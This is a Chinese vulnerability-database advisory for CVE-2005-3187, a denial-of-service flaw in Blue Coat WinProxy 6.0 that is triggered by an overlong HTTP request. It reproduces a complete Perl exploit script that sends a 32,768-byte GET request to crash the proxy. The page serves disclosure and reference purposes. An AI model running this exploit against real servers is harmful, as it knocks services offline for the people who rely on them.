Blue Coat Systems WinProxy远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109601 漏洞类型 其他
发布时间 2006-01-07 更新时间 2006-01-10
CVE编号 CVE-2005-3187 CNNVD-ID CNNVD-200512-938
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1409
https://www.securityfocus.com/bid/16148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-938
|漏洞详情
BlueCoatWinProxy是适用于中小业务的Internet共享代理服务器。WinProxy处理超长的畸形请求时存在问题,远程攻击者可能利用此漏洞对服务进行拒绝服务攻击。WinProxy无法正确的处理大约为32,768个字节长的HTTP请求。如果攻击者能够在TCP80端口向WinProxyserver发送上述的特制HTTP请求的话,就可以导致进程崩溃。仅有可访问包含有监听守护程序网段的攻击者才可以利用这个漏洞。在某些情况下这样的网段是专用的本地网。
|漏洞EXP
#!perl
#
# "WinProxy 6.0 R1c" Remote DoS Exploit
#
# Author:  FistFucker
# e-Mail:  FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;


print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n";

$sock = IO::Socket::INET->new
(

    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.\n";

$sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n");

print "[+] DoS string has been sent.";

close($sock);

# milw0rm.com [2006-01-07]
|受影响的产品
Blue Coat Systems WebProxy 6.0
|参考资料

来源:BID
名称:16148
链接:http://www.securityfocus.com/bid/16148
来源:IDEFENSE
名称:20060105BlueCoatWinProxyRemoteDoSVulnerability
链接:http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
来源:VUPEN
名称:ADV-2006-0065
链接:http://www.frsirt.com/english/advisories/2006/0065
来源:SECUNIA
名称:18288
链接:http://secunia.com/advisories/18288
来源:NSFOCUS
名称:8380
链接:http://www.nsfocus.net/vulndb/8380